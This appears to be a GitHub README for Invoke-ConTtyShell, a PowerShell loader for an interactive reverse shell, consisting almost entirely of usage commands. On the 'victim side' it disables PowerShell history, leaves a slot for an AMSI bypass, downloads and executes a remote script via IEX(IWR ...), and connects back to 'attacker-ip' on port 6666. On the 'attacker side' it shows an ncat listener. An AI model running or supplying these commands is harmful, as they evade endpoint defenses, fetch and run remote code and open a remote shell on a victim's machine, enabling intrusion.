/Invoke-ConTtyShell

.Net Assembly loader for the ConTtyShell

Primary LanguagePowerShell

Invoke-ConTtyShell

.Net Assembly loader for ConTtyShell

Tested on:

  • Windows 10 22H2 x64
  • Windows 11 22H2 x64

Victim side usage:

Set-PSReadlineOption -HistorySaveStyle SaveNothing

<Insert-Your-AMSI-Bypass-From-AMSI.FAIL-Here>

[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12
# [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

[system.net.webrequest]::defaultwebproxy = new-object system.net.webproxy('http://proxy:8080')
[system.net.webrequest]::defaultwebproxy.BypassProxyOnLocal = $true
[system.net.webrequest]::defaultwebproxy.credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials

# [system.net.webrequest]::defaultwebproxy.credentials = Get-Credential

IEX(IWR -UseBasicParsing -UserAgent "hi-there-blueteam" 'https://raw.githubusercontent.com/ricardojba/Invoke-ConTtyShell/main/Invoke-ConTtyShell.ps1')

Invoke-ConTtyShell -Command "attacker-ip 6666"

Attacker side usage:

stty raw -echo; (stty size; cat) | ncat -lvnp 6666